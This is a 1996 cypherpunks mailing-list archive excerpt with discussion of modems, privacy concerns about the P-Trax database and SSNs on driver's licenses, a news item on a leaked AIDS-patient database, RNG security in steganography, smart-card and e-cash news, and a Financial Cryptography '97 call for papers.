10:15:22 1996 From: pjb at ny.ubs.com (pjb at ny.ubs.com) Date: Sat, 21 Sep 1996 01:15:22 +0800 Subject: All Bets Off Message-ID: <199609201336.JAA09683@sherry.ny.ubs.com> actually, i understood that he was an insurance salesman. -paul > From cypherpunks-errors at toad.com Fri Sep 20 06:43:59 1996 > Date: Thu, 19 Sep 1996 17:19:44 -0400 (EDT) > From: The Deviant > To: Daniel Christopher Miskell > Cc: Rabid Wombat , cypherpunks at toad.com > Subject: Re: All Bets Off > Organization: The Silicon Pirates > Mime-Version: 1.0 > Content-Type> : > TEXT/PLAIN> ; > charset=US-ASCII> > Sender: owner-cypherpunks at toad.com > Content-Length: 754 > > On Thu, 19 Sep 1996, Daniel Christopher Miskell wrote: > > > Date: Thu, 19 Sep 1996 11:30:32 -0400 > > From: Daniel Christopher Miskell > > To: Rabid Wombat > > Cc: cypherpunks at toad.com > > Subject: Re: All Bets Off > > > > >On Tue, 17 Sep 1996, Jeff Davis wrote: > > > > > [lots of quoting rm'd] > > > > > Tom Clancy is not a military-hired brain, but to make his novels realistic and > > to do justice to the people he portrays, he does a LOT of research. He is a > > highly respected author, and I have no doubt that his statement is based on > > his personal findings, collected for a previous novel. > > > > I beleive he was also a Capain in the Navy... > > --Deviant > Old MacDonald had an agricultural real estate tax abatement. > > > From wb8foz at wauug.erols.com Fri Sep 20 10:30:39 1996 From: wb8foz at wauug.erols.com (David Lesher / hated by RBOC's in 5 states) Date: Sat, 21 Sep 1996 01:30:39 +0800 Subject: 56 kbps modems In-Reply-To: <199609200744.AAA07457@toad.com> Message-ID: <199609201408.KAA11269@wauug.erols.com> John Gilmore sez: > > > The rest of this is speculation and fantasy on my part. {....} This goes along with what others have postulated. But I have to wonder -- how long will the [re]train take? One of the gripes about PEP was that retrains were slow.... This sounds slower. Further, how stable will the outcome be -- will the 'slop' in the CO's AD conversion overwhelm things? Lastly, what will the RBOC's do to stifle its use? [I take it as a given that they will object to anything that benefits subscribers and does not give them an added cut.. witness ISDN pricing, for example.] -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From bdolan at USIT.NET Fri Sep 20 10:48:14 1996 From: bdolan at USIT.NET (Brad Dolan) Date: Sat, 21 Sep 1996 01:48:14 +0800 Subject: "Confidential" medical databases Message-ID: AP, 9/19/96: Copies of a confidential computer disk containing the names of 4,000 AIDS patients were shipped anonymously to two newspapers by someone who claimed a [Florida] state health worker had been showing it on his laptop computer to friends outside a gay bar. William B. Calvert III, 35, of Treasure Island, was one of only three state Department of Health and Rehabilitative Services employees with authorized access to the confidential information. Calvert was suspended with pay Thursday as the Florida Department of Law Enforcement and HRS investigated the breach. "This is very serious. We are not aware of any breach of confidentiality of this magnitude," Jay Coburn of the AIDS Action Council in Washington, D.C. said Thursday. Nobody knows how many copies of the disk have been made, or who has them. If the allegations prove true, it could be the worst violation of AIDS confidentiality in history. [...] bd From DMiskell at envirolink.org Fri Sep 20 10:49:37 1996 From: DMiskell at envirolink.org (Daniel Christopher Miskell) Date: Sat, 21 Sep 1996 01:49:37 +0800 Subject: The periodic caveat about Timmy May Message-ID: >attila writes: > >> In <199609190517.HAA00851 at basement.replay.com>, on 09/19/96 >> at 07:17 AM, nobody at flame.alias.net (Anonymous) said: >> >> = .Timmy May habitually digs into his cesspool of a mind for his >> = .mailing list fertilizer. >> >> this is humour. it tickles the imagination, and the reference >> to tim is lost! > >Can we get all this non-crypto-relevant shit off of this mailing list please? > >--- > >Dr.Dimitri Vulis KOTM >Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps Sorry, dear, but complaining isn't going to change it, and simple telling people to shut the fuck up is going to go nowhere. If you want solely crypto relevent material, subscribe to the filtered list. I mean, come on -- you know this list is suseptable (sp?) to noise and spam. Besides, people suggest to me that you are the anonymous mailer. So maybe you should keep a low profile on this. -- If in fact we are the only intelligent life on this planet, why the fuck are we in this goddamn mess? -- Find my public key on the World Wide Web -- point your browser at: http://bs.mit.edu:8001/pks-toplev.html From corbet at stout.atd.ucar.edu Fri Sep 20 11:05:41 1996 From: corbet at stout.atd.ucar.edu (Jonathan Corbet) Date: Sat, 21 Sep 1996 02:05:41 +0800 Subject: anonymous bacon Message-ID: <199609201506.JAA03295@atd.atd.ucar.EDU> The following, from RISKS, deserves redistribution.... Date: Tue, 17 Sep 1996 13:04:47 -0400 From: pcw at access.digex.net (Peter Wayner) Subject: Bringing Home the Anonymous Bacon The *Baltimore Sun* reports in its 17 Sep 1996 issue that people in Baltimore are paying for drugs with meat (page A1! [pretty saucy!]). Perhaps this is not yet anonymous digital cash, but certainly anonymous. [Now someone is going to propose keeping a database of all sides of beef, and steganographically watermarking the meat in the context of digitally signed scannable grade-stamps. Perhaps the next step in monitoring the private drug-meat trade would be to escrow the inspectors' private keys, derived from the product of two U.S. Primes, and put the database up on the net: the T-bone connected to the M-bone, etc.? PGN] From brianh at u041.oh.vp.com Fri Sep 20 11:11:26 1996 From: brianh at u041.oh.vp.com (Brian Hills) Date: Sat, 21 Sep 1996 02:11:26 +0800 Subject: ANYONES CREDIT CARD # per your request. Message-ID: Thought this would be appropriate to the list Forwarded message: > From u082.wi.vp.com!alis Fri Sep 20 10:57:39 1996 > Message-Id: > From: alis at u082.wi.vp.com (Ali Sajanlal) > Subject: Credit Card information (fwd) > To: nd at u082.wi.vp.com > Date: Fri, 20 Sep 96 9:53:03 CDT > X-Mailer: ELM [version 2.3 PL8] > > Forwarded message: > > Date: 20 Sep 96 18:38:16 > > Subject: Credit Card information > > > ______________________________ Forward Header __________________________________ > > Subject: FYI - Check this out > > Author: alis at u082.wi.vp[.com > > Date: 9/20/96 10.00 AM > > > FYI - Check this out > > > > Unfortunately, this message needs to be propagated to protect all of us. > > > > Note: Lexis-Nexis is only accepting written or fax requests. You have the > > option to fax your removal request to (513) 865-1930 state your full name > > and complete address. Or mail the request to: > > Lexis-Nexis > > Attn: P-Track > > P.O. Box 933 > > Dayton, Ohio > > 45401-0933 > > > > > > >Subject: FYI > > >Author: Nathan Judge at NYERPOC > > >Date: 9/16/96 2:42 PM > > > > > >Your name, social security number, current address, previous addresses, > > >mother's maiden name, birth date and other personal information are now > > >available to anyone with a credit card through a new Lexis database called > > >P-Trax. As I am sure you are aware, this information could be used to > > commit > > >credit card fraud or otherwise allow someone else to use your identity. > > > > > >You can have your name and information removed from this list by making a > > >telephone request. Call (800)543-6862, select option 4 and then option 3 > > >("all other questions") and tell the representative answering that you wish > > >to remove your name from the P-trax database. You may also send a fax to > > >(513) 865-7360, or physical mail to LEXIS-NEXIS / P.O. Box 933 / Dayton, > > >Ohio 45401-0933. Sending physical mail to confirm your name has been > > removed > > >is always a good idea. > > > > > >As word of the existence of this database has spread on the net, > > Lexis-Nexis > > >has been inundated with calls, and has set up a special set of operators to > > > > >handle the volume. In addition, Andrew Bleh (rhymes with "Play") is a > > >manager responsible for this product, and is the person to whom complaints > > >about the service could be directed. He can be reached at the above 800 > > >number. Ask for extension 3385. According to Lexis, the manager > > responsible > > >is Bill Fister at extension 1364. > > > > > >Please forward this e-mail to everyone we know. > > > > > > > Ali S. > > -- > > > > > > > > > > > > > > > > > > > > > > > > > > > -- //!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\ Brian Hills Varco-Pruden Buildings 1202 Industrial Dr. Van Wert, OH 45891 419.238.9533 - brianh at u041.oh.vp.com \\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!// From burris at apdg.com Fri Sep 20 11:30:29 1996 From: burris at apdg.com (Kurt Vile) Date: Sat, 21 Sep 1996 02:30:29 +0800 Subject: DL in exchange for fingerprint In-Reply-To: Message-ID: <199609201528.KAA13170@apdg.com> >By the way, the next rev of the California driver's license will >reportedly have one's *Social Security Number* printed on the card! >So much for the statement clearly printed on my card: Illinois already has such a law, in fact you must have an SSN to even get a DL. Fortunately, the law allows a citizen-unit to choose if they want their SSN on their DL (imagine that, a choice!) - the flip side is that you have to specifically ask them not to print them - they won't ask you. One would hope that CA's law might provide a similar out... --Kurt From jya at pipeline.com Fri Sep 20 11:59:02 1996 From: jya at pipeline.com (John Young) Date: Sat, 21 Sep 1996 02:59:02 +0800 Subject: Free E-Cash Message-ID: <199609201551.PAA22207@pipe4.ny3.usa.pipeline.com> WSJ, September 20, 1996, p. A16. Fed Chief to U.S: Back Off On Electronic-Cash Rules Washington -- Regulators should stay out of the way and let the market for electronic money develop without government meddling, said Alan Greenspan, chairman of the Federal Reserve Board. "The private sector will need the freedom to experiment without broad interference from the government," he told a government conference on electronic cash yesterday. Too much interference could impede innovation, he said. Bank debit cards, along with other forms of electronic payments, "account for a very small percentage of transactions," he said. "Even the use of popular credit cards has only recently begun to challenge paper's dominance." [End] From m5 at tivoli.com Fri Sep 20 12:21:54 1996 From: m5 at tivoli.com (Mike McNally) Date: Sat, 21 Sep 1996 03:21:54 +0800 Subject: Stego inside encryption In-Reply-To: Message-ID: <3242C142.4A37@tivoli.com> Dale Thorn wrote: > > Mullen Patrick wrote: > > To take this one step further, has anyone tried to ever use this > > method as an encryption method? You could hide data in a stream of > > random bits, using position as the encryption method. It doesn't matter *what* you do with your bits. The key thing to remember when analyzing your encryption method is that the foundation of your security rests on the difficulty of reversing the numeric sequence that drives the encryption. If I know you're using this RNG-driven steganographic message mixer, then if I can break your RNG I'm done. If I know you're scrambling bits in a file according to an RNG, if I break your RNG I'm done. The key is therefore to make the RNG cryptographically secure. Once you've done that, then there's questionable value in doing anything fancier than straight CBC (or something like that) to encrypt your plaintext. Note that simple functional composition of one or more simple insecure RNG's does not necessarily give you a stronger RNG (in fact it usually doesn't). Cheap RNG's like what you get from the old UNIX "rand()" are simple little linear functions, which when composed give you more simple functions. ______c_________________________________________________________________ Mike M Nally * IBM % Tivoli * Austin TX * How quickly we forget that mailto:m5 at tivoli.com mailto:m101 at io.com * "deer processing" and "data http://www.io.com/~m101/ * processing" are different! From m5 at tivoli.com Fri Sep 20 12:23:01 1996 From: m5 at tivoli.com (Mike McNally) Date: Sat, 21 Sep 1996 03:23:01 +0800 Subject: CNET Digital Dispatch Vol. 2 No. 38 In-Reply-To: <3.0b19.32.19960920021220.0050fc50@gateway.grumman.com> Message-ID: <3242C2A2.4947@tivoli.com> Rick Osborne wrote: > did they mean DES or is the EDS something I'm not aware of. EDS is "Electronic Data Systems", the company Ross & a buddy started back in the late 60's/early 70's. That's where Ross made his money. EDS is a place that when Ross was in charge (and maybe still today) was a lot like what Grumman sounds like in terms of employee security issues. Armed guards patrolled the computer rooms when I was working there (1979). ______c_________________________________________________________________ Mike M Nally * IBM % Tivoli * Austin TX * How quickly we forget that mailto:m5 at tivoli.com mailto:m101 at io.com * "deer processing" and "data http://www.io.com/~m101/ * processing" are different! From dlv at bwalk.dm.com Fri Sep 20 12:29:24 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 03:29:24 +0800 Subject: [NEWS] Crypto-relevant wire clippings Message-ID: <3R7JuD3w165w@bwalk.dm.com> News Release (Environics): Monday, September 16, 1996 Smart Card Forum Draws 500 Industry & Government Leaders SAN FRANCISCO-- The Smart Card Forum today announced that more than 500 industry and government leaders met at its Annual Meeting in San Francisco to review the progress of smart card technology and to lay the foundation for the accelerating pace of its adoption during 1997. Representatives from a "who's who" of government and corporate America gained first-hand information and senior-level perspectives that will help them make strategic decisions around the use of smart cards in emerging markets such as payment, network security, relationship banking, remote data access, and cellular phone security. The way in which the combination of PC and smart card technologies will accelerate the deployment of new applications providing a greater security and portability on the Internet was an area of particular interest. "As these exciting new applications are created and gain momentum during the next five years," says Jean McKenna, Forum President, "the smart card becomes a logical vehicle for distributed information management, identification, security and payment." According to McKenna, who also is V.P. Payment Technologies, Visa International, "The impact will be revolutionary, widespread and positive -- especially for consumers." Speakers on the theme: The History of Money - The Future of Payments: Past, Present and Future Perspectives on How Commerce is Enabled, included: -- Martin Mayer, author of The Bankers and numerous financial and business books and Guest Scholar at The Brookings Institution in Washington, D.C.; -- Peter Hill, Executive Vice President, Visa International; and -- Michel Ugon, Vice President, R&D, Bull CP8, and early developer of the microprocessor smart card. 1996 will be looked at as the year when stored value applications on smart cards started serious deployment in North America. The 1996 Annual Meeting reflected the crest of this wave with presentations today on four leading stored value card implementations. The speakers were: -- Cynthia Bengier, Vice President, Wells Fargo, for Mondex International; -- Edgar Brown, Vice President, First Union National Bank, for Visa Cash; -- Michael Bradley, Project Manager, Bank of Montreal, for Proton; and -- Lin D. Ison, Executive Manager, Smart Card Systems, Commonwealth Bank of Australia, for MasterCard Cash. The next wave in smart technology The next wave coming that will capture more and more energy of the Forum and its members is the Internet. The combination of PCs and smart cards will promote the development of new applications that tie security and portability together. "The emergence of 'virtual' merchants and the expansion of mechanized payment options promises to offer consumers, merchants, and financial institutions a broad set of new opportunities," says Roger Bertman, Vice President and General Manager, Internet Commerce, VeriFone. "In particular, the Internet will offer a whole new world of selling and buying, and the mechanization of what has been cash will provide a basis for expanded purchasing options. The smart card will clearly be the 'glue' that will enable the disparate worlds of physical and 'virtual' merchants and a broad spectrum of payment methods to be brought together in order to tap these opportunities." Interoperability was among the pivotal issues addressed by Gerald Smith, Manager, Smart Consumer Services, IBM. "As smart card implementations evolve from single to multiple-applications and from single to multiple-issuer services, the subject of interoperability is gaining increased scrutiny," says Smith. To achieve critical mass, interoperability between cards and reading devices is required. Panelists addressing the future directions and strategies of payment included: -- Janet Hartung, SVP, Wells Fargo; -- Marlee Laks, Technology Leader, American Express; -- Tim Steward, EVP, Mondex International; -- John Tunstall, VP, MasterCard International; -- Bette Wasserman, VP, Bank of America; and -- Gaylen Howe, Visa International. John D. Wright, Senior Counsel, Wells Fargo, and John Burke, Partner, Foley, Hoag & Eliot LLP, moderated a panel discussion of key legal, public policy and private issues presented by a multi-application smart card, including Regulation E, FDIC insurance and relevant state laws. Consumer and merchant research shows smart card potential A new Forum study made public at the meeting indicates that merchants are quickly focusing on the many other benefits smart cards offer, beyond the stored value application, and they see different benefits to be derived from the technology. These benefits include customer information, offering loyalty or "frequent shopper" programs, electronic ticketing and couponing and stored value for self-service purchases. A second important finding of the study is that a surprisingly low level of customer base penetration is required for many merchants to realize the benefits of smart cards. Grocery stores, convenience stores, movie theaters and gasoline retailers indicated that a mere two to 10 percent of consumers -- an extremely low threshold of marketplace demand -- is required for them to realize the benefits of smart card implementation. "A smart card, as opposed to a magnetic stripe card, has the capability of storing information, monetary value, processing transactions off-line, and enhancing a consumer's security and privacy," McKenna says. "Merchants are quickly focusing on the many benefits smart cards can offer both them and consumers." Consumers also favor multi-application smart cards -- 61 percent responded positively in Forum research. They prefer multi-application smart cards in order to carry and access information needed in an emergency and to reduce the number of cards carried, paper records kept and forms to be filled out. The Smart Card Forum The Smart Card Forum is a non-profit, multi-industry membership organization promoting the widespread acceptance of multiple application smart card technology in North America. Its primary mission is to bring together in an open forum, leaders from both the private and public sectors to address topics associated with the development and evolution of smart card technology applications. The Forum was established in September 1993 and currently has more than 225 corporate and government members including: Chase Manhattan, Citibank, Bellcore, MCI, MasterCard, Visa, IBM, Microsoft, Mobil Oil, Schlumberger, Gemplus, Delta Airlines, U.S. Postal Service, the Federal Reserve, U.S. Department of Treasury and U.S. Department of Defense. Associated Press: September Wednesday, September 18, 1996 As Electronic Cash Emerges In U.S., Regulation In Question By Guy Dixon NEW YORK-- As microchip-embedded smart cards hit the market, U.S. banks and credit-card companies are hedging their bets. They don't want regulations that prevent new applications for smart-card technology - from simple cashless purchases to potential uses like bank or credit-card fund transfers, all with a single card. But they also quietly welcome rules that could boost their market share over other companies issuing competing smart cards. The main issue is whether the U.S. Federal Reserve Board will require smart-card issuers to provide receipts for all sorts of electronic cash transactions, a move that could play to the strength of the credit card issuers that now dominate electronic transactions by applying rules they must follow already for conventional credit and debit cards. Established card companies which have dominated the U.S. credit-card market since the 1960s are hoping government policy on electronic cash will follow the lines of current bank and credit card regulation. To address some of these concerns, the U.S. Treasury will host a conference on September 19-20 in Washington, D.C. on the role of government in electronic money and banking. Scheduled speakers include Treasury Secretary Robert Rubin, Federal Reserve Board Chairman Alan Greenspan, and Citicorp Chairman and CEO John Reed. So far, the Fed is taking a wait-and-see approach on emerging electronic money. 'The general consensus is that we don't want to over-regulate and stifle innovation,' said Washington Fed spokesman Joe Coyne. Yet as new digital cash products hit the market, many say regulators will have to adapt existing rules to the emerging electronic cash market. Banks, in particular, worry that if regulation is too lax, all sorts of non-financial companies could flood the market with alternative cash forms. They worry about being driven out of the electronic market by competition, said Gerald O'Driscoll, vice-president and director of policy analysis at Citicorp. Analysts point out that regional and long-distance phone companies, along with other large and trusted companies, could easily market their own smart cards to customers, such as a smart-card version of AT&T Corp.'s Universal card. Indeed, AT&T is collaborating with National Westminster Bank PLC to develop smart cards in the U.S. The problem with any new regulation is that no one knows what type of smart cards the market will embrace. Smart cards are currently being test-marketed primarily as stored-value cards, holding a limited cash amount that a cardholder can use for purchases until the card runs out. Yet with a smart card's microchip able to hold up to 80 times more information than the magnetic strips on conventional credit cards, many in the industry see the distinctions between bank cards, credit cards and store-value cards blurring to the point where a single smart card could do the work of all three. European credit cards already commonly come equipped with microchips, allowing merchants to verify a payment at the point of purchase. And stored-valued telecom cards with tiny chips are everywhere. 'In the end, it comes down to which features people will pay for,' said Lawrence White, economist and electronic commerce analyst at the University of Georgia. 'And that is the danger of regulation jumping the gun.' Visa USA's test run of smart cards in Atlanta during the Olympic Games featured cards that used only a fraction of a microchip's potential. The cards stored amounts of up to $100 which cardholders could then draw on for purchases. Some Atlanta banks, such as First Union, went one step further, issuing cards whose value could be reloaded. In another promotional blitz, participants at Vancouver's international AIDS conference this summer could buy VISA Cash cards for use at conference venues. Later this year, VISA plans another trial run of stored-value smart cards in Manhattan's Upper West Side with MasterCard, Citibank and Chase Manhattan. These smart cards, typically sold in $10, $20, $50 and $100 denominations, differ from debit cards, such as checking cards which already are being distributed widely by many banks in the United States and Canada. When a debit card is inserted into a merchant's card reader, the amount of the purchase is deducted from the buyer's bank account. Because there is a transfer of funds, the merchant's card-reading device has to be connected to a bank or credit card company by phone lines. Smart cards, however, can transfer a certain amount of funds from the card itself to a card-reading device usually without having to go on-line. Not all smart cards are alike. A leading competitor to VISA Cash and MasterCard's smart cards is National Westminster Bank's Mondex card, now being test-marketed in the U.K. and soon in Canada. Mondex cards are stored-value cards, with the added feature that the funds can be transferred electronically to another Mondex card, allowing a card-owner to give money to someone else in the same way one can with cash, said Fred Billings, a Mondex developer at the Royal Bank of Canada. AT&T is currently in an alliance with NatWest to develop the Mondex card in the U.S., said Mitch Montagna, spokesman for AT&T Universal Card Services. VISA's technology, on the other hand, is geared more toward the company's long-term approach of sticking to established credit-card billing and account practices, a traditional market niche VISA want to hold on to with affliated banks, said VISA USA Executive Vice-President Rosalind Fisher. 'We are riding that horse right now, but we'll have to see which system the market takes to,' Fisher said. But some digital cash developers continue to worry that any regulatory move, once it comes, may be the wrong one for their product. Much of the debate hinges on Regulation E of the 1976 Electronic Funds Transfer Act, say analysts. Reg E requires issuers of ATM and other electronic fund transfer cards to provide receipts and account statements to cardholders. It also requires issuers to assume certain liabilities if funds are electronically lost or stolen. Stored-value smart cards are seen as largely exempt from this regulation, at least for the time being. The Fed is still weighing the impact of cards in denominations of $100 or less. But the industry is going on the assumption that stored-value cards of $100 and under will not require receipts or credit statements, said VISA USA's Fisher. WNET's Future of Money: September 16, 1996 Viewpoints Is Cyberspace Safe for Financial Transactions Today? YES. William M. Randle, Senior Vice President and Director of Marketing, Huntington Bancshares, Inc. Some cyberspac transactions can be made very secure with technology in use today. But... The security currently in place is not ready to safeguard fast, simple, low-cost transactions that would allow customers to order items and authorize direct bank payment to the merchant. That would require the financial information pathways between banks to be protected by public-private key encryption, such as RSA encryption, invulnerable to unauthorized persons. And the value of encryption depends on a reliable authentication procedure, assuring that both senders and receivers of financial information are who they say they are. A variety of solutions to protect every stage of cyberspace transactions have been proposed. I am most impressed with the system in use at Security First National Bank, the first Web-only bank, as well as at Huntington National Bank; it has been approved by the government for secure electronic banking transactions, and has been proven over time. The system server, the Hewlett-Packard Virtual Vault, has been used by the Department of Defense for a number of years, and the banking software was developed by 5 Paces Technology in Atlanta. The problem of authentication is harder to solve. Real-time settlement of third-party transactions will require all insured financial services institutions to agree on a central trusted authority to provide for the safety and soundness of the future electronic payment system and insure privacy of information for all involved. Not only must the authentication procedure be reliable---it must also be perceived as reliable, and implicitly trusted by buyers and sellers, if electronic commerce is to grow to its full potential. Currently, the banking industry is engaged in a collaborative effort to evaluate the technology that exists today, with a view toward the creation of such an authority. As the group most knowledgeable and experienced in handling money safely and efficiently, and which has long held the public trust in financial matters, it is to be hoped that they succeed. When they do, the answer to the question "is cyberspace safe for financial transactions today?" can be answered with an unqualified Yes." NO. Colin Crook, Senior Technology Officer, Citibank. The fact is that secure financial transactions cannot be assured today in the new and dramatically changing landscape of cyberspace. Market participants need to improve security and learn more about doing business in the electronic marketplace before providing assurance to their customers that they can safely do business there. Companies must be honest with their customers, making them aware of the risks of doing business in cyberspace and providing assurance that the enterprise values the customer's security and privacy. Today we are witnessing a series of experiments in electronic commerce, experiments conducted by all sorts of companies. These opportunities for learning-- on the part of both market participants and customers--will lead to further improved products and to levels of security that approach, or even surpass, the levels present today outside of cyberspace. The experiments are challenging the capabilities of both the technology and the enterprise itself, and the willingness of the customer to accept new and often novel ways of doing business. Customers value this kind of experimentation and innovation; however, where the customer's money is concerned, we at Citibank have learned that trust is paramount! In this context, managing the balance of the level of security with the factors of customer convenience and business opportunity becomes the focus in moving forward. Companies must manage risk so as not to compromise customer trust. Because some companies-- mostly non-traditional providers of financial services-- have released products very quickly, a major concern is that ill-conceived or hasty experiments may cause damage to the reputation of the entire marketplace. Because absolute security is impossible, an overriding consideration for security and customer trust must dominate the experiments- -which Citibank and other institutions with long histories of customer relationships emphasize in their approaches to cyberspace transactions. Customers already understand and accept the risks associated with credit cards and other financial instruments. Customers in cyberspace should be aware of the experimental nature of this new business environment and use caution before taking on the risks contained within it. As Senior Vice President and Director of Marketing and Strategic Planning at Huntington Bancshares Inc., William M. Randle has developed direct service channels, including Huntington Access, which uses teleconferencing and other electronic channels in the world's first complete virtual branch offices. On June 2 of this year, Huntington launched a Web-based bank. Colin Crook is Senior Technology Officer, Citibank. He is responsible for establishing technology policy and standards, introducing new technology, evaluating the quality and direction of system efforts, and introducing technology policy within the corporation. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From R.Hirschfeld at cwi.nl Fri Sep 20 12:36:19 1996 From: R.Hirschfeld at cwi.nl (R.Hirschfeld at cwi.nl) Date: Sat, 21 Sep 1996 03:36:19 +0800 Subject: Financial Cryptography '97 Call for Papers Message-ID: <9609201543.AA27824=ray@groen.cwi.nl> Financial Cryptography '97 February 24-28 1997, Anguilla, BWI CALL FOR PAPERS General Information: Financial Cryptography '97 (FC97) is a new conference on the security of digital financial transactions. The first meeting will be held on the island of Anguilla in the British West Indies on February 24-28, 1997. FC97 aims to bring together persons involved in both the financial and data security fields to foster cooperation and exchange of ideas. Original papers are solicited on all aspects of financial data security and digital commerce in general, including Anonymous Payments Fungibility Authentication Home Banking Communication Security Identification Conditional Access Implementations Copyright Protection Loss Tolerance Credit/Debit Cards Loyalty Mechanisms Currency Exchange Legal Aspects Digital Cash Micropayments Digital Receipts Network Payments Digital Signatures Privacy Issues Economic Implications Regulatory Issues Electronic Funds Transfer Smart Cards Electronic Purses Standards Electronic Voting Tamper Resistance Electronic Wallets Transferability Instructions for Authors: Send a cover letter and 9 copies of an extended abstract to be received by November 29, 1996 (or postmarked by November 15, 1996 and sent via airmail) to the Program Chair at the address given below. The extended abstract should start with the title and an abstract followed by a succinct statement appropriate for a non-specialist reader specifying the subject addressed, its background, the main achievements, and their significance to financial data security. Submissions are limited to 15 single-spaced pages of 12pt type. Notification of acceptance or rejection will be sent to authors no later than January 17, 1997. Authors of accepted papers must guarantee that their paper will be presented at the conference. Additional Information: Conference pricing and information on travel, hotels, and Anguilla itself will follow in a separate general announcement. A very limited number of stipends may be available to those unable to obtain funding to attend the conference. Students whose papers are accepted and who will present the paper themselves are encouraged to apply if such assistance is needed. Requests for stipends should be addressed to one of the General Chairs. Those interested in becoming a sponsor of FC97 or in purchasing exhibit space, please contact the Exhibits and Sponsorship Manager. A workshop, intended for anyone with commercial software development experience who wants hands-on familiarity with the issues and technology of financial cryptography, is planned in conjunction with FC97, to be held during the week preceding the conference. For information, please contact one of the General Chairs. Send Submissions to: Rafael Hirschfeld FC97 Program Chair CWI Kruislaan 413 1098 SJ Amsterdam The Netherlands email: ray at cwi.nl phone: +31 20 592 4169 fax: +31 20 592 4199 Program Committee: Matthew Franklin, AT&T Laboratories--Research, Murray Hill, NJ, USA Michael Froomkin, U. Miami School of Law, Coral Gables, FL, USA Rafael Hirschfeld, CWI, Amsterdam, The Netherlands Arjen Lenstra, Citibank, New York, NY, USA Mark Manasse, Digital Equipment Corporation, Palo Alto, CA, USA Kevin McCurley, Sandia Laboratories, Albuquerque, NM, USA Charles Merrill, McCarter & English, Newark, NJ, USA Clifford Neuman, Information Sciences Institute, Marina del Rey, CA, USA Sholom Rosen, Citibank, New York, NY, USA Israel Sendrovic, Federal Reserve Bank of New York, New York, NY, USA General Chairs: Robert Hettinga, Shipwright, Boston, MA, USA Vincent Cate, Offshore Information Services, Anguilla, BWI Conference, Exhibits, and Sponsorship Manager: Julie Rackliffe, Boston, MA, USA Workshop Leader: Ian Goldberg, Berkeley, CA, USA Financial Cryptography '97 is held in cooperation with the International Association for Cryptologic Research. A copy of this call for papers as well as other information about the conference will be available at URL http://www.cwi.nl/conferences/FC97. From dlv at bwalk.dm.com Fri Sep 20 12:41:57 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 03:41:57 +0800 Subject: [NEWS] Crypto-relevant wire clippings Message-ID: New York Times, Tuesday, September 17, 1996 Intuit Selling Bill-Processing Unit For $227 Million By LAURIE J. FLYNN Intuit Inc., the United States' leading seller of personal-finance software, announced Monday that it would sell its electronic bill-payment processing business to its main competitor in that field, Checkfree Corp., for $227.6 million in stock. Intuit, which also announced widening financial losses Monday, now intends to focus on its core software businesses, while expanding its services over the Internet. The deal with Checkfree comes as Intuit is under pressure from the banks it works with, which want to expand their options for electronic bill-processing. Currently, banks wishing to provide electronic services to consumers using Intuit's popular Quicken personal-finance software have had to operate through Intuit's bill-processing subsidiary, Intuit Services Corp. Lately, consumers and financial institutions have shown a preference for conducting business over the Internet rather than over proprietary networks like Intuit Services. But while Intuit had come to view bill processing as a costly distraction, Checkfree said that adding Intuit's operations would be a cost-effective way of expanding its own main line of business. Checkfree, based in Columbus, Ohio, markets its electronic transaction-processing services exclusively to banks and other financial institutions. Those customers use Checkfree's services to provide home banking and bill payment to consumers. Unlike Intuit's network, Checkfree's operations will work with a variety of personal-finance programs. With the acquisition of the Intuit Services unit, Checkfree gains Intuit's relationships with 39 banks and more than 300,000 electronic bill-processing customers, bringing its total number of bank customers to 181 and its consumer base to nearly 1.2 million. The companies, both of whose stocks surged on the news, said they expected to close the deal by the end of the year, pending regulatory and shareholder approval. Intuit's stock rose $2.125 a share Monday, to $32.25; Checkfree gained $3.1875, to $21.25. Wall Street analysts applauded Intuit's decision to withdraw from what they said amounted to the back end of the transaction-processing business, at a time when more full-fledged electronic commerce may finally be catching on. In the future, analysts said, Intuit's best on-line opportunities will be in providing a consumer ``interface'' to the Internet, rather than getting bogged down in the pipes and plumbing of transaction processing. And while Intuit remains the leader in its core business - personal financial-management software - the company is facing increased competition from Microsoft Corp., maker of a program called Microsoft Money. Microsoft had agreed to acquire Intuit in October 1994 in a deal worth roughly $2 billion, but abandoned that plan last year under antitrust scrutiny from the justice department. ``It's a strategy shift,'' Lise Buyer, an analyst at T. Rowe Price in Baltimore, said of Intuit's announcement. ``But it's impressive that Intuit is willing to reverse course so quickly.'' Scott Cook, founder and chairman of Intuit, which is based Menlo Park, Calif., said that transaction-processing had become a distraction. ``It was a sizable investment of dollars but also of management time and resources, in a business that is not central to our core competencies,'' Cook said. As a result of the deal, which includes the transfer of 12.6 million shares of Checkfree stock, Intuit will acquire a 23 percent stake in Checkfree. Intuit executives said they planned eventually to reduce the company's share to 19.9 percent, in order to operate as a minority shareholder and not have to carry Checkfree's results on Intuit's books. Intuit also announced widening losses for its fiscal fourth quarter ended July 31, which it attributed to recent acquisitions of companies that included Interactive Insurance Services Corp. Including charges, the fourth-quarter net loss grew to $22 million, or 48 cents a share, from $1.4 million, or 3 cents a share, a year earlier. That was in line with analysts' expectations. Checkfree's chief executive and chairman, Peter Kight, said that his company would lose money in 1997 as a result of the Intuit Services acquisition. But he called it a necessary step, as banks step up their on-line efforts. While the Checkfree acquisition may be subject to government scrutiny, neither analysts nor the companies expect any antitrust delays - primarily because there are other large competitors in the electronic check-clearing business. Last week, for example, IBM added itself to that list, with the announcement of Integrion, a venture with 22 banks to provide electronic bill-processing and other transactions. The Checkfree deal will enable Intuit to concentrate on its growing array of Internet-based on-line services. Bill Harris, Intuit's executive vice president, said Intuit would begin to offer ``front-end'' banking services over the Internet by late next year. American Banker: Tuesday, September 17, 1996 Rumors of MasterCard's Plans To Buy Mondex Nearing Reality By VALERIE BLOCK MasterCard International is nearing an agreement to acquire Mondex, the stored value smart card technology developed by National Westminster Bank of London. The deal, which has been the subject of months of negotiations and rumors, was hinted at in a speech that MasterCard president H. 